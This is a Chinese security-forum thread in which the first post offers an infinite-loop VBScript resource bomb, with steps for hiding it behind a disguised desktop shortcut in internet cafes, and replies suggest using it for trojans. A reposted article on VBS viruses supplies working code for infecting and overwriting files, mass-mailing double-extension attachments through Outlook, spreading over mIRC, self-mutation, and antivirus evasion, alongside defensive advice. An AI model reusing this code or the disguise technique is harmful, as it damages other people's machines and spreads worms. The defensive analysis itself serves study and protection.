论坛: 病毒专区 标题: 一个我写的恶意代码(没有那么恶意啦,但是机子越好就越讨厌这个) 复制本贴地址    
作者: bobogun [bobogun]    论坛用户   登录
do 
dim fso,f1 
set fso=createobject("ws cript.shell") 
f1=fso.run("c:\command.com")'说明:可以是任何软件,也可以是很多软件一起运行 
loop 

将以上代码复制在写字本中,然后存为xxx.vbs文件(相信大家都会) 
存在C:\WINDOWS下面(这样别人不好找) 
然后到桌面上,随便找个图标(一定是快捷方式才可以啊!)右键--属性,然后在路径上把你刚才的存的VBS文件路径写上"C:\windows\xxx.vbs"刷新一下,结果图标变VBS的图标了,怎么办?接下来再点右键,看到右下角那个更改图标没有?恩,改一个好的图标或者原来的图标这样就滴水不漏了,当别人来电击的时候,就会被这个突然打开的N多MS DOS方式吓坏了! 
(以上适用于网吧,仅做玩笑,勿用于非法用途)
以上本人原创,在WIN98系统的网吧里面测试成功(最后出现"资源严重不足!")
希望大家指教!!!



地主 发表时间: 05/26 03:20

回复: yangze [yangze]   版主   登录
这个方法可能用来运行木马。不错,好点子。

B1层 发表时间: 05/27 09:40

回复: jeikspil [jiekspil]   论坛用户   登录
DOS是16位。9X是32位,虽然兼容但有时运行是不是有问题呢?尤其是在16位下运行32位的好东东。。。

B2层 发表时间: 05/27 17:39

回复: bobogun [bobogun]   论坛用户   登录
jeik老兄你说的什么意思呢?我采。不懂:(
因为我对这个还是不懂,编点小东西容易,要有编程思想那真的好难为我啊!!!


B3层 发表时间: 06/03 11:26

回复: vj110 [vj110]   论坛用户   登录
这个东西不错,,
老兄,你的意思把他搞到快节方式里面,,别人运行的,是你这个炸弹
对吧,,,那也就是说,,我不用这着,,他本身就是个炸弹了
我可以发给人家让人家运行,,人家也可以。。。。。。
说的对吗?
呵呵,,如果不搞在快节方式里,,,把他放在启动里面?
哇!!~~~那不是爽呆了?呵呵~~~~~~~~~~那就惨死了,,哈哈哈

B4层 发表时间: 06/05 04:10

回复: vj110 [vj110]   论坛用户   登录
对了,,我还想知道,,这个东西能在什么系统里面工作啊?
可以在98还是2000,都可以在什么系统下运行?
呵呵,,谢谢

B5层 发表时间: 06/05 04:13

回复: kill [killboy]   论坛用户   登录
按照你的方法改出来的图标只是一个快捷方式...如果我要想改原本的启动怎么办?? 有办法改吗??

B6层 发表时间: 06/12 17:33

回复: bobogun [bobogun]   论坛用户   登录
运行可以在任何安装了WINDOWS SCRIPT HOST的电脑上运行,也就是说只要是WINDOWS就可以了,而且这个本来只是用createobject调用外部对象的一个小把戏。至于KILL说的我不是很明白但是我们可以改成这样的:
比如运行QQ
set wsh=createobject("wscript.shell")
f=wsh.run("c:\progam~1\tencent\qq2000b.exe")
但是要把原来的文件改变就不可能了,(反正我不会)

B7层 发表时间: 06/14 12:22

回复: woodstone [woodstone]   论坛用户   登录
小意思

B8层 发表时间: 06/17 11:06

回复: cg2327 [cg2327]      登录
我用的
系统是WIN98
IE5。0
IE被恶意网站修改过了
当我运行时出现了以下
ActiveX 部件不能创建对象: 'ws cript.shell'
可能是恶意网站修改的吧!


B9层 发表时间: 04-05-29 22:37

回复: lgd [lgdlgd]   论坛用户   登录
我拿自己的机子试了一下,我打开的是一个TXT文件,一开始我就博命点鼠标关窗口,一会就不行了,出现一连串内存严重不足的提示,于是一边按着ENTER不放,一边关窗口,反应一会慢一会正常,预先打开的任务管理器滚动条仍然在飞快的缩短,快死了,最后关头,我奇迹般将那TXT文件成功删除(曾多次提示内存不足,不能删除),然后按着ALT+F4有半分钟不放,真是惊险,建议玩玩。

B10层 发表时间: 04-05-30 03:51

回复: bridge [bridge]   论坛用户   登录
这是一个炸弹,能消耗掉所有的资源,最终死机。

B11层 发表时间: 04-05-31 09:53

回复: drckness [drckness]   论坛用户   登录
对于FSO控件一般杀毒软件都会提示的!

B12层 发表时间: 04-06-01 09:53

回复: moley [moley]   论坛用户   登录
郁闷,这样的代码也出来了,老套!


B13层 发表时间: 04-06-01 10:45

回复: tabris17 [tabris17]   论坛用户   登录
请看原贴年代

B14层 发表时间: 04-06-01 15:43

回复: NetGreat [kailangq]   版主   登录
我晕?谁把2002年的老帖翻出来了.....

B15层 发表时间: 04-06-01 17:50

回复: rheazhu [rheazhu]   论坛用户   登录
    哈哈...温帮知新嘛....举一要反三的噻!~~

B16层 发表时间: 04-06-05 17:27

回复: unitears [qing]   论坛用户   登录
有写好的老帖子那出来也很好啊,毕竟网络常有新手啊.起是有些知识我们这些新手看来还是很过瘾黑过瘾的,呵呵:不信我贴一个


“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。当您收到一封主题为“I Love You”的邮件,用兴奋得几乎快发抖的鼠标去点击附件的时候;当您浏览一个信任的网站之后,发现打开每个文件夹的速度非常慢的时候,您是否察觉病毒已经闯进了您的世界呢?2000年5月4日欧美爆发的“宏病毒”网络蠕虫病毒。由于通过电子邮件系统传播,宏病毒在短短几天内狂袭全球数百万计的电脑。微软、Intel等在内的众多大型企业网络系统瘫痪,全球经济损失达几十亿美元。而去年爆发的新欢乐时光病毒至今都让广大电脑用户更是苦不堪言。


  上面提及的两个病毒最大的一个共同特点是:使用VBScript编写。以宏病毒和新欢乐时光病毒为典型代表的VBS脚本病毒十分的猖獗,很重要的一个原因就是其编写简单。下面我们就来逐一对VBS脚本病毒的各个方面加以分析:


  一、Vbs脚本病毒的特点及发展现状


  VBS病毒是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。应该说病毒就是一种思想,但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点:


  1.编写简单,一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。


  2.破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃,网络发生严重阻塞。

  
3.感染力强。由于脚本是直接解释执行,并且它不需要像PE病毒那样,需要做复杂的PE文件格式处理,因此这类病毒可以直接通过自我复制的方式感染其他同类文件,并且自我的异常处理变得非常容易。

  
4.传播范围大。这类病毒通过htm文档,Email附件或其它方式,可以在很短时间内传遍世界各地。

  
5.病毒源码容易被获取,变种多。由于VBS病毒解释执行,其源代码可读性非常强,即使病毒源码经过加密处理后,其源代码的获取还是比较简单。因此,这类病毒变种比较多,稍微改变一下病毒的结构,或者修改一下特征值,很多杀毒软件可能就无能为力。

  
6.欺骗性强。脚本病毒为了得到运行机会,往往会采用各种让用户不大注意的手段,譬如,邮件的附件名采用双后缀,如.jpg.vbs,由于系统默认不显示后缀,这样,用户看到这个文件的时候,就会认为它是一个jpg图片文件。

  
7.使得病毒生产机实现起来非常容易。所谓病毒生产机,就是可以按照用户的意愿,生产病毒的机器(当然,这里指的是程序),目前的病毒生产机,之所以大多数都为脚本病毒生产机,其中最重要的一点还是因为脚本是解释执行的,实现起来非常容易,具体将在我们后面谈及。
正因为以上几个特点,脚本病毒发展异常迅猛,特别是病毒生产机的出现,使得生成新型脚本病毒变得非常容易。
[未结束] 



“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  二、Vbs脚本病毒原理分析


  1.vbs脚本病毒如何感染、搜索文件

  
VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而宏病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过宏病毒的部分代码具体分析一下这类病毒的感染和搜索原理:

  
以下是文件感染的部分关键代码:

  
Set fso=createobject("scripting.filesystemobject")

   '创建一个文件系统对象

  set self=fso.opentextfile(wscript.scriptfullname,1)

  '读打开当前文件(即病毒本身)

  vbscopy=self.readall

  ' 读取病毒全部代码到字符串变量vbscopy……

  set ap=fso.opentextfile(目标文件.path,2,true)

  ' 写打开目标文件,准备写入病毒代码

  ap.write vbscopy ' 将病毒代码覆盖目标文件

  ap.close

  set cop=fso.getfile(目标文件.path) '得到目标文件路径

  cop.copy(目标文件.path & ".vbs")

  ' 创建另外一个病毒文件(以.vbs为后缀)

  目标文件.delete(true)

   '删除目标文件

  
上面描述了病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。


  下面我们具体分析一下文件搜索代码:


  '该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本

  sub scan(folder_) 'scan函数定义,

  on error resume next '如果出现错误,直接跳过,防止弹出错误窗口

  set folder_=fso.getfolder(folder_)

  set files=folder_.files ' 当前目录的所有文件集合

  for each file in filesext=fso.GetExtensionName(file)

   '获取文件后缀

  ext=lcase(ext) '后缀名转换成小写字母

  if ext="mp5" then '如果后缀名是mp5,则进行感染。

  请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。

  Wscript.echo (file)

  end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目录;递归调用

   scan( ) scan(subfolder)[未结束] 


“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  next

  end sub

  
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。


  2.vbs脚本病毒通过网络传播的几种方式及代码分析


  VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:


  1)通过Email附件传播

  
这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。


  下面我们具体分析一下VBS脚本病毒是如何做到这一点的:

  
Function mailBroadcast()

  on error resume next

  wscript.echo

  Set outlookApp = CreateObject("Outlook.Application")

  //创建一个OUTLOOK应用的对象

  If outlookApp= "Outlook" Then

   Set mapiObj=outlookApp.GetNameSpace("MAPI")

   //获取MAPI的名字空间

   Set addrList= mapiObj.AddressLists

   //获取地址表的个数

   For Each addr In addrList

   If addr.AddressEntries.Count <> 0 Then

   addrEntCount = addr.AddressEntries.Count

  //获取每个地址表的Email记录数

   For addrEntIndex= 1 To addrEntCount

   //遍历地址表的Email地址

  Set item = outlookApp.CreateItem(0)

   //获取一个邮件对象实例

  Set addrEnt = addr.AddressEntries(addrEntIndex)

   //获取具体Email地址

  item.To = addrEnt.Address

   //填入收信人地址

  item.Subject = "病毒传播实验"

   //写入邮件标题

  item.Body = "这里是病毒邮件传播测试,收到此信请不要慌张!

  " //写入文件内容

   Set attachMents=item.Attachments //定义邮件附件

  attachMents.Add fileSysObj.GetSpecialFolder(0)&"\test.jpg.vbs"

  item.DeleteAfterSubmit = True

   //信件提交后自动删除

  If item.To <> "" Then

   item.Send

   //发送邮件

  shellObj.regwrite "HKCU\software\Mailtest\mailed", "1"

  //病毒标记,以免重复感染

   End If

  NextEnd IfNext

  End if

  End Function

  
2)通过局域网共享传播

  
局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。
[未结束] 


“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  在VBS中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。


  welcome_msg = "网络连接搜索测试"

  Set WSHNetwork = WScript.CreateObject("WScript.Network")

   ’创建一个网络对象

  Set oPrinters = WshNetwork.EnumPrinterConnections

   ’创建一个网络打印机连接列表

  WScript.Echo "Network printer mappings:"

  For i = 0 to oPrinters.Count - 1Step2

   ’显示网络打印机连接情况

  WScript.Echo "Port "&oPrinters.Item(i)

  & " = " & oPrinters.Item(i+1)

  Next

  Set colDrives = WSHNetwork.EnumNetworkDrives

   ’创建一个网络共享连接列表

  If colDrives.Count = 0 Then

  MsgBox "没有可列出的驱动器。",

  vbInformation + vbOkOnly,welcome_msg

  Else

  strMsg = "当前网络驱动器连接: " &CRLF

  Fori=0To colDrives.Count - 1 Step 2

  strMsg = strMsg & Chr(13)&Chr(10)&colDrives(i)

  & Chr(9)&colDrives(i+1)

  Next

  MsgBox strMsg, vbInformation + vbOkOnly,

  welcome_msg’显示当前网络驱动器连接

  End If

  
上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后,我们就可以直接向目标驱动器读写文件了。


  3)通过感染htm、asp、jsp、php等网页文件传播

  
如今,WWW服务已经变得非常普遍,病毒通过感染htm等文件,势必会导致所有访问过该网页的用户机器感染病毒。


  病毒之所以能够在htm文件中发挥强大功能,采用了和绝大部分网页恶意代码相同的原理。基本上,它们采用了相同的代码,不过也可以采用其它代码,这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOT\CLSID\下我们可以找到这么一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B},注册表中对它他的说明是“Windows Script Host Shell Object”,同样,我们也可以找到{0D43FE01-F093-11CF-8940-00A0C9054228},注册表对它的说明是“FileSystem Object”,一般先要对COM进行初始化,在获取相应的组件对象之后,病毒便可正确地使用FSO、WSH两个对象,调用它们的强大功能。代码如下所示:
Set Apple0bject = document.applets("KJ_guest")Apple0bject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")Apple0bject.createInstance() ’创建一个实例[未结束] 

“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  Set WsShell Apple0bject.Get0bject()

  Apple0bject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")

  Apple0bject.createInstance()

   ’创建一个实例

  Set FSO = Apple0bject.Get0bject()

  对于其他类型文件,这里不再一一分析。

  
4)通过IRC聊天通道传播


  病毒通过IRC传播一般来说采用以下代码(以MIRC为例)


  Dim mirc

  set fso=CreateObject("Scripting.FileSystemObject")

  set mirc=fso.CreateTextFile("C:\mirc\script.ini")

   ’创建文件script.ini

  fso.CopyFile Wscript.ScriptFullName, "C:\mirc\attachment.vbs",

   True ’将病毒文件备份到attachment.vbs

  mirc.WriteLine "[script]"

  mirc.WriteLine "n0=on 1:join:*.*:

  {if($nick !=$me){halt} /dcc send $nick C:\mirc\attachment.vbs }"

  '利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件

  mirc.Close

  
以上代码用来往Script.ini文件中写入一行代码,实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令,这个文件里面的命令是可以自动执行的。譬如,TUNE.VBS病毒就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样,如果Pirch98已安装在目标计算机的c:\pirch98目录下,病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini,使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。


  另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中,这样,当其他用户访问这台机器时,就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。


  还有一些其他的传播方法,我们这里不再一一列举。


  3.VBS脚本病毒如何获得控制权

  
如何获取控制权?这一个是一个比较有趣的话题,而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法:


  1)修改注册表项


  windows在启动的时候,会自动加载HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序,这样就可以保证每次机器启动的时候拿到控制权。vbs修改贮册表的方法比较简单,直接调用下面语句即可。 wsh.RegWrite(strName, anyvalue [,strType])
[未结束] 

“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  2)通过映射文件执行方式

  
譬如,我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。


  3)欺骗用户,让用户自己执行


  这种方式其实和用户的心理有关。譬如,病毒在发送附件时,采用双后缀的文件名,由于默认情况下,后缀并不显示,举个例子,文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg,这时用户往往会把它当成一张图片去点击。同样,对于用户自己磁盘中的文件,病毒在感染它们的时候,将原有文件的文件名作为前缀,vbs作为后缀产生一个病毒文件,并删除原来文件,这样,用户就有可能将这个vbs文件看作自己原来的文件运行。


  4)desktop.ini和folder.htt互相配合


  这两个文件可以用来配置活动桌面,也可以用来自定义文件夹。如果用户的目录中含有这两个文件,当用户进入该目录时,就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt,还可能触发exe文件,这也可能成为病毒得到控制权的一种有效方法!


  病毒获得控制权的方法还有很多,这方面作者发挥的余地也比较大。


  4.vbs脚本病毒对抗反病毒软件的几种技巧

  
病毒要生存,对抗反病毒软件的能力也是必需的。一般来说,VBS脚本病毒采用如下几种对抗反病毒软件的方法:


  1)自加密


  譬如,新欢乐时光病毒,它可以随机选取密钥对自己的部分代码进行加密变换,使得每次感染的病毒代码都不一样,达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术,使得每次感染后的加密病毒的解密后的代码都不一样。


  下面看一个简单的vbs脚本变形引擎(来自flyshadow)

  
Randomize

  Set Of = CreateObject("Scripting.FileSystemObject")

  ’创建文件系统对象

  vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall

   ’读取自身代码

  fS=Array("Of", "vC", "fS", "fSC")

   ’定义一个即将被替换字符的数组

  For fSC = 0 To 3

  vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))

   & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65))

   & Chr((Int(Rnd * 22) + 65)))

   ’取4个随机字符替换数组fS中的字符串

  Next

  Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC ’将替换后的代码写回文件
上面这段代码使得该VBS文件在每次运行后,其Of,vC,fS,fSC四字符串都会用随机字符串来代替,这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。
[未结束] 

“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  2)巧妙运用Execute函数


  用过VBS程序的朋友是否会觉得奇怪:当一个正常程序中用到了FileSystemObject对象的时候,有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高,但是有些VBS脚本病毒同样采用了FileSystemObject对象,为什么却又没有任何警告呢?原因很简单,就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时,会检查程序中是否声明使用了FileSystemObject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过Execute(String)函数执行,就可以躲避某些反病毒软件。

  
3)改变某些对象的声明方法


  譬如fso=createobject("scripting.filesystemobject"),我们将其改变为

  fso=createobject("script"+"ing.filesyste"+"mobject"),这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。


  4)直接关闭反病毒软件


  VBS脚本功能强大,它可以直接在搜索用户进程然后对进程名进行比较,如果发现是反病毒软件的进程就直接关闭,并对它的某些关键程序进行删除。


  5.Vbs病毒生产机的原理介绍


  所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件。在很多人看来这或许不可思议,其实对脚本病毒而言它的实现非常简单。


  脚本语言是解释执行的、不需要编译,程序中不需要什么校验和定位,每条语句之间分隔得比较清楚。这样,先将病毒功能做成很多单独的模块,在用户做出病毒功能选择后,生产机只需要将相应的功能模块拼凑起来,最后再作相应的代码替换和优化即可。由于篇幅关系和其他原因,这里不作详细介绍。


  三、如何防范vbs脚本病毒


  1.如何从样本中提取(加密)脚本病毒


  对于没有加密的脚本病毒,我们可以直接从病毒样本中找出来,现在介绍一下如何从病毒样本中提取加密VBS脚本病毒,这里我们以新欢乐时光为例。


  用JediEdit打开folder.htt。我们发现这个文件总共才93行,第一行<BODY onload="vbscript:KJ_start()">,几行注释后,以<html>开始,</html>节尾。相信每个人都知道这是个什么类型的文件吧!


  第87行到91行,是如下语句:
87:<script language=vbscript> 88:ExeString = "Afi FkSeboa)EqiiQbtq)S^pQbtq)AadobaPfdj)>mlibL^gb`p)CPK...;后面省略,很长!

  89:Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0)[未结束] 

“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  = 3"&vbCrLf&"KeyArr(1) = 3"&vbCrLf&"KeyArr(2) =

  3"&vbCrLf&"KeyArr(3) = 4"&vbCrLf&"For i=1

  To Len(ExeString)"&vbCrLf&"TempNum =

   Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum =

  18 Then"&vbCrLf&"TempNum =

  34"&vbCrLf&"End If"&vbCrLf&"TempChar =

  Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar =

  Chr(28) Then"&vbCrLf&"TempChar =

  vbCr"&vbCrLf&"ElseIf TempChar =

  Chr(29) Then"&vbCrLf&"TempChar =

  vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText =

  ThisText & TempChar"&vbCrLf&"Next") 90:

  Execute(ThisText) 91:</script>

  
第87和91行不用解释了,第88行是一个字符串的赋值,很明显这是被加密过的病毒代码。看看89行最后的一段代码ThisText = ThisText & TempChar,再加上下面那一行,我们肯定能够猜到ThisText里面放的是病毒解密代码(熟悉vbs的兄弟当然也可以分析一下这段解密代码,too simple!就算完全不看代码也应该可以看得出来的)。第90行是执行刚才ThisText中的那段代码(经过解密处理后的代码)。


  那么,下一步该怎么做呢?很简单,我们只要在病毒代码解密之后,将ThisText的内容输出到一个文本文件就可以解决了。由于上面几行是vbscript,于是我创建了如下一个.txt文件:

  
首先,copy第88、89两行到刚才建立的.txt文件,当然如果你愿意看看新欢乐时光的执行效果,你也可以在最后输入第90行。然后在下面一行输入创建文件和将ThisText写入文件vbs代码,整个文件如下所示:


  ExeString = "Afi...’ 第88行代码

  Execute("Dim KeyAr... ’ 第89行代码

  set fso=createobject("scripting.filesystemobject")

   ’ 创建一个文件系统对象

  set virusfile=fso.createtextfile("resource.log",true)

  ’ 创建一个新文件resource.log,

  用以存放解密后的病毒代码 virusfile.writeline(ThisText)

   ’ 将解密后的代码写入resource.log

  
OK!就这么简单,保存文件,将该文件后缀名.txt改为.vbs(.vbe也可以),双击,你会发现该文件目录下多了一个文件resource.log,打开这个文件,怎么样?是不是“新欢乐时光”的源代码啊!

  
2.vbs脚本病毒的弱点
vbs脚本病毒由于其编写语言为脚本,因而它不会像PE文件那样方便灵活,它的运行是需要条件的(不过这种条件默认情况下就具备了)。笔者认为,VBS脚本病毒具有如下弱点:
[未结束] 

“VBS”脚本病毒特点 原理分析以及如何防范
2003年10月14日15:22:00 guojpeng/cvc.gb 
广告




  1)绝大部分VBS脚本病毒运行的时候需要用到一个对象:FileSystemObject

  
2)VBScript代码是通过Windows Script Host来解释执行的。


  3)VBS脚本病毒的运行需要其关联程序Wscript.exe的支持。


  4)通过网页传播的病毒需要ActiveX的支持


  5)通过Email传播的病毒需要OE的自动发送邮件功能支持,但是绝大部分病毒都是以Email为主要传播方式的。


  3.如何预防和解除vbs脚本病毒


  针对以上提到的VBS脚本病毒的弱点,笔者提出如下集中防范措施:


  1)禁用文件系统对象FileSystemObject


  方法:用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。


  还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{0D43FE01-F093-11CF-8940-00A0C9054228}的项,咔嚓即可。


  2)卸载Windows Scripting Host


  在Windows 98中(NT 4.0以上同理),打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件],取消“Windows Scripting Host”一项。


  和上面的方法一样,在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}的项,咔嚓。


  3)删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射

  
点击[我的电脑]→[查看]→[文件夹选项]→[文件类型],然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。


  4)在Windows目录中,找到WScript.exe,更改名称或者删除,如果你觉得以后有机会用到的话,最好更改名称好了,当然以后也可以重新装上。


  5)要彻底防治VBS网络蠕虫病毒,还需设置一下你的浏览器。我们首先打开浏览器,单击菜单栏里“Internet 选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用,这样就不怕了。呵呵,譬如新欢乐时光的那个ActiveX组件如果不能运行,网络传播这项功能就玩完了。


  6)禁止OE的自动收发邮件功能


  7)由于蠕虫病毒大多利用文件扩展名作文章,所以要防范它就不要隐藏系统中已知文件类型的扩展名。Windows默认的是“隐藏已知文件类型的扩展名称”,将其修改为显示所有文件类型的扩展名称。


  8)将系统的网络连接的安全级别设置至少为“中等”,它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。


  9)呵呵,最后一项不说大家也应该知道了,杀毒软件确实很必要,尽管有些杀毒软件挺让广大用户失望,不过,选择是双方的哦。在这个病毒横飞的网络,如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。


  四、对所有脚本类病毒发展的展望

  
随着网络的飞速发展,网络蠕虫病毒开始流行,而VBS脚本蠕虫则更加突出,不仅数量多,而且威力大。由于利用脚本编写病毒比较简单,除了将继续流行目前的VBS脚本病毒外,将会逐渐出现更多的其它脚本类病毒,譬如PHP,JS,Perl病毒等。但是脚本并不是真正病毒技术爱好者编写病毒的最佳工具,并且脚本病毒解除起来比较容易、相对容易防范。笔者认为,脚本病毒仍将继续流行,但是能够具有像宏病毒、新欢乐时光那样大影响的脚本蠕虫病毒只是少数。


B17层 发表时间: 04-06-06 04:25

回复: lijingxi [lijingxi]   见习版主   登录

代码已经被列为病毒了!
我刚一打开这个网页 我的杀毒软件就提示病毒!


B18层 发表时间: 04-06-07 09:35

回复: unitears [qing]   论坛用户   登录
晕果真有
不过应该对机子没有害

[此贴被 unitears(qing) 在 06月07日18时20分 编辑过]

B19层 发表时间: 04-06-07 18:19

回复: w3srv [w3srv]   论坛用户   登录
command.com,2000以上用不了吧?

B20层 发表时间: 04-06-08 18:15

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号